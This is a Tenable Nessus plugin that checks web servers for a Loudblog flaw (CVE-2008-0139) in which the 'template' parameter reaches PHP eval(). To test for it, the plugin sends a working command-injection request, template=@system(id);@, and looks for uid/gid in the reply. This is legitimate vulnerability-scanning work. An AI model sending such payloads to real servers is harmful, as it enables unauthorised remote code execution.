#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that allows arbitrary
command execution. 

Description :

The remote host is running Loudblog, a PHP application for publishing
podcasts and similar media files. 

The version of Loudblog on the remote host fails to sanitize input to
the 'template' parameter of the 'loudblog/inc/parse_old.php' script
before using it in an 'eval()' statement to evaluate PHP code. 
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can leverage this issue to execute arbitrary
code on the remote host subject to the privileges of the web server
user id. 

See also :

http://www.milw0rm.com/exploits/4849

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(29869);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2008-0139");
  script_bugtraq_id(27157);
  script_xref(name:"milw0rm", value:"4849");
  script_xref(name:"OSVDB", value:"40200");
  script_xref(name:"Secunia", value:"28336");

  script_name(english:"Loudblog template Parameter Command Execution Vulnerability");
  script_summary(english:"Tries to run a command using Loudblog");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) extra_dirs = make_list("/loudblog", "/podcast", "/podcasts", cgi_dirs());
else extra_dirs = make_list(cgi_dirs());

# Try to exploit the issue to run a command.
cmd = "id";
url = string(
  "/loudblog/inc/parse_old.php?",
  "template=@system(", urlencode(str:cmd), ");@&",
  "php_use=1&",
  "phpseparator=@"
);

http_check_remote_code(
  extra_dirs    : extra_dirs,
  check_request : url,
  check_result  : "uid=[0-9]+.*gid=[0-9]+.*",
  command       : cmd,
  description   : desc,
  port          : port
);
